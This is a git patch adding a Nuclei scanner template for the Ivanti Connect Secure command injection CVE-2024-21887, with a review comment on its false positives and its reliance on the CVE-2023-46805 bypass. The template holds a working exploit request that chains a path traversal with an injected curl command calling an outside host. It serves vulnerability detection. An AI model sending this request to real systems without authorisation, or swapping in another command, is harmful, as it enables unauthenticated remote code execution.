From 665e99c56812353f3ef3a6584f18392beec1775f Mon Sep 17 00:00:00 2001
From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com>
Date: Wed, 17 Jan 2024 02:23:45 +0530
Subject: [PATCH] Create CVE-2024-21887.yaml
---
http/cves/2024/CVE-2024-21887.yaml | 32 ++++++++++++++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100644 http/cves/2024/CVE-2024-21887.yaml
diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml
new file mode 100644
index 0000000000..1e0c868821
--- /dev/null
+++ b/http/cves/2024/CVE-2024-21887.yaml
@@ -0,0 +1,32 @@
+id: CVE-2024-21887
+
+info:
+ name: Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection
+ author: pdresearch, parthmalhotra, iamnoooob
+ severity: critical
+ description: A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.
+ reference:
+ - https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
+ - https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 9.1
+ cve-id: CVE-2024-21887
+ cwe-id: CWE-77
+ cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
+ metadata:
+ vendor: ivanti
+ product: connect_secure
+ tags: cve,cve2024,interactsh,kev,rce,cmdi
+
+http:
+ - raw:
+ - |
+ GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20{{interactsh-url}} HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
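Review bot: The only matcher, `part: interactsh_protocol` with the word `http`, fires on any HTTP hit to the interactsh URL, so a proxy, WAF or URL-scanning gateway that fetches URLs it sees in request paths would be reported as a critical finding on a host that never ran the command. Because the request invokes curl, the callback can be tied to the appliance itself by adding `matchers-condition: and` and a second word matcher on `part: interactsh_request`, as sketched below. Separately, `description` says an authenticated administrator is required, yet the request carries no credentials and reaches the endpoint through `/api/v1/totp/user-backup-code/../../`, which looks like the CVE-2023-46805 bypass named in the references. That dependency should be documented in `description`, e.g. `This check reaches the endpoint via CVE-2023-46805, so a negative result where only the bypass is fixed or mitigated does not show that CVE-2024-21887 is patched.`

```yaml
    matchers-condition: and
    matchers:
      # … unchanged: interactsh_protocol "http" matcher …
      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
```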